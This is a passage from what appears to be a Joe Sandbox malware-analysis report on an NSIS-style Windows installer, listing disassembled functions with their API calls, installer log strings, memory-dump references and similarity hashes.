                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 2320649405-0
                                                                                                      • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                      • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                      • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                      • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                      Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427979,759223A0,00000000), ref: 00404FD6
                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427979,759223A0,00000000), ref: 00404FE6
                                                                                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427979,759223A0,00000000), ref: 00404FF9
                                                                                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                        • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                        • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                      • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                      Strings
                                                                                                      • Exec: command="%s", xrefs: 00402241
                                                                                                      • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                      • Exec: success ("%s"), xrefs: 00402263
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                      • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                      • API String ID: 2014279497-3433828417
                                                                                                      • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                      • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                      • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                      • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                      Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                      • GetMessagePos.USER32 ref: 0040489D
                                                                                                      • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                      • String ID: f
                                                                                                      • API String ID: 41195575-1993550816
                                                                                                      • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                      • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                      • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                      • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                      Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                      • MulDiv.KERNEL32(00025000,00000064,0042FC67), ref: 00403295
                                                                                                      • wsprintfW.USER32 ref: 004032A5
                                                                                                      • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                      Strings
                                                                                                      • verifying installer: %d%%, xrefs: 0040329F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                      • String ID: verifying installer: %d%%
                                                                                                      • API String ID: 1451636040-82062127
                                                                                                      • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                      • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                      • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                      • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                      Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                      • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                      • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                      • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Char$Next$Prev
                                                                                                      • String ID: *?|<>/":
                                                                                                      • API String ID: 589700163-165019052
                                                                                                      • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                      • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                      • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                      • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                      Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Close$DeleteEnumOpen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1912718029-0
                                                                                                      • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                      • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                      • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                      • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                      Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                      • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                      • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 1849352358-0
                                                                                                      • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                      • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                      • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                      • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                      Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Timeout
                                                                                                      • String ID: !
                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                      • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                      • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                      • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                      • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                      Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                      • wsprintfW.USER32 ref: 00404483
                                                                                                      • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                      • String ID: %u.%u%s%s
                                                                                                      • API String ID: 3540041739-3551169577
                                                                                                      • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                      • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                      • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                      • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                      Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                      Strings
                                                                                                      • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                      • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                      • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                      • API String ID: 1697273262-1764544995
                                                                                                      • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                      • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                      • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                      • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                      Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                        • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                        • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                      • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                      • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                      • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                      • String ID: CopyFiles "%s"->"%s"
                                                                                                      • API String ID: 2577523808-3778932970
                                                                                                      • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                      • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                      • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                      • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                      Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
